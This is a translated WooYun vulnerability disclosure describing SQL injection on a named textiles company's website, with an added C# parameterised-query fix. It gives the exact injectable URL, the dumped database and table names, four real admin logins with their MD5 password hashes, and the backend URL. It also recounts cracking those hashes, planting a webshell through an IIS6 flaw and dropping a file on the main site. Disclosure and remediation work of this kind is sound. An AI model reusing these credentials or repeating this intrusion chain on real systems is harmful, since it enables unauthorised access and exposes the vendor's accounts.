
Vulnerability summary

Defect ID: wooyun-2014-056996

Title: Mendale Home Textiles SQL injection affects the main site

Vendor: mendale.com

Author: 卡卡

Submitted: 2014-04-14 10:53

Fixed: 2014-05-29 10:54

Published: 2014-05-29 10:54

Vulnerability type: successful intrusion event

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-04-14: details sent to the vendor, awaiting vendor handling
2014-04-15: vendor confirmed; details disclosed to the vendor only
2014-04-25: details disclosed to core white hats and domain experts
2014-05-05: details disclosed to regular white hats
2014-05-15: details disclosed to intern white hats
2014-05-29: details disclosed to the public

Brief description:

SQL injection on one of Mendale Home Textiles' sites. Any gifts on offer?

Detailed description:

The problem is on this site:

http://love.mendale.com.cn/


A blind injection, and a very slow one to extract~~~
Injection point:

http://love.mendale.com.cn/html/news/newsfast.aspx?MenuID=4&SearchInfo=1


Injection info:

[screenshot]


Databases:

available databases [6]:
[*] [mengjie\x03]
[*] master
[*] Mendale
[*] model
[*] msdb
[*] tempdb


Current database: Mendale
Tables:

Database: Mendale
[37 tables]
+------------------+
| Culture |
| Employment |
| FamilySituation |
| Glimpses |
| GlimpsesType |
| IPAddress |
| IPBlacklist |
| IPVisit |
| ImageCarousel |
| InvDown |
| InvDownType |
| InvRelations |
| JobAppForm |
| JobType |
| ManageUser |
| Menu |
| Mess |
| MessType |
| NewType |
| News |
| OperationLog |
| OperationType |
| RecAnnouncement |
| RecType |
| Roles |
| SpecialReports |
| Television |
| TelevisionType |
| TopicType |
| UserLoginLog |
| WorkExperience |
| Bo?" |
| Brand♣☻ |
| CulType◄☻ |
| `\?81uSituation |
| dtpropertiey☻Q!A |
| aB |
+------------------+


Because this is a blind injection, some names did not come back cleanly, but that does not matter.
Admin accounts:

Table: ManageUser
[4 entries]
+----------------------------------+------------+
| loginpwd | LoginUser |
+----------------------------------+------------+
| 4A3D04E200DB98302A50615DB2FD59C5 | 1 |
| 534754E15742134EBFC084532A93AE99 | WUWW |
| 7F59FA288A11AC121FD605E09940E45D | MJHR |
| 80CBA3D0DBD1F6A80B4DC8C59DFBBD94 | wujuan2005 |
+----------------------------------+------------+


Backend address:

http://love.mendale.com.cn/webmaster/Index.aspx


Cracked the MD5 and logged in to the backend successfully

[screenshot]


Used the IIS6 file-parsing vulnerability to get a shell

[screenshot: shell.png]


Found that the main site lives on the same machine, and directory permissions are very loose, so crossing over to the main site is no problem at all; dropped a txt to show off

[screenshot: txt.png]


Database credentials in plain view:

<add name="Mendale" connectionString="server=.;user id=mjjt****;password=eman****;database=Mendale;min pool size=4;max pool size=512;packet size=3072" providerName="System.Data.SqlClient"/>
<add name="Mendale.mdb" providerName="System.Data.OleDb" connectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=|DataDirectory|Mendale.mdb;"/>
<add name="OraConnString" connectionString="Data Source=localhost;user id=BS;password=********;min pool size=4;max pool size=4" providerName="System.Data.OracleClient"></add>


[screenshot]


The sensitive parts are replaced with asterisks..
Even at ASP privilege level commands can be executed; privilege escalation looks like no problem by eye
This was only a test, nothing was damaged; please delete the shell yourselves
Rank, anyone? A girlfriend, anyone? Gifts, anyone?

Proof of vulnerability:


Fix recommendation:

You know the drill~~~ Asking for a girlfriend, for rank, for gifts~~~
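What the fix amounts to for the newsfast.aspx injection point, as an added example that is not the site's code or anything from the report: the two query-string parameters, MenuID and SearchInfo, are type-checked and bound as SqlParameters instead of being concatenated into the statement. The News table, its columns and the NewsGrid control are assumed names; "Mendale" is the web.config connection-string name shown in the report.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

// Added example, not the site's code: newsfast.aspx rewritten so MenuID and
// SearchInfo never reach SQL Server as statement text. Table "News" and its
// columns are assumed names; "Mendale" is the connection string from web.config.
public partial class NewsFast : Page
{
    // The injectable pattern this replaces looks like:
    //   "SELECT ... FROM News WHERE MenuID=" + Request["MenuID"]
    //   + " AND Title LIKE '%" + Request["SearchInfo"] + "%'"
    protected void Page_Load(object sender, EventArgs e)
    {
        // Numeric parameter: parse it, never concatenate it.
        int menuId;
        if (!int.TryParse(Request.QueryString["MenuID"], out menuId))
        {
            Response.StatusCode = 400;
            return;
        }
        // Free-text parameter: bounded length, then bound as data.
        string search = Request.QueryString["SearchInfo"] ?? string.Empty;
        if (search.Length > 100) search = search.Substring(0, 100);
        NewsGrid.DataSource = SearchNews(menuId, search); // assumed GridView
        NewsGrid.DataBind();
    }

    internal static DataTable SearchNews(int menuId, string search)
    {
        string cs = ConfigurationManager.ConnectionStrings["Mendale"].ConnectionString;
        const string sql =
            "SELECT Title, PubDate FROM News WHERE MenuID = @menuId AND Title LIKE @pattern";
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@menuId", SqlDbType.Int).Value = menuId;
            // Escape LIKE metacharacters ([ first) so input cannot widen the match.
            string pattern = "%" + search.Replace("[", "[[]")
                                         .Replace("%", "[%]")
                                         .Replace("_", "[_]") + "%";
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 120).Value = pattern;
            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table);
            return table;
        }
    }
}
```

The rest of the chain in the report is closed separately: the ManageUser hashes are unsalted MD5 and should be replaced with a salted, slow hash (for example Rfc2898DeriveBytes), and the account named in the "Mendale" connection string should be a low-privilege login restricted to that database rather than one that can enumerate master, model and msdb.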

Copyright notice: please credit 卡卡@乌云 when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-04-15 14:39

Vendor reply:

Thanks for the information

Latest status:

None yet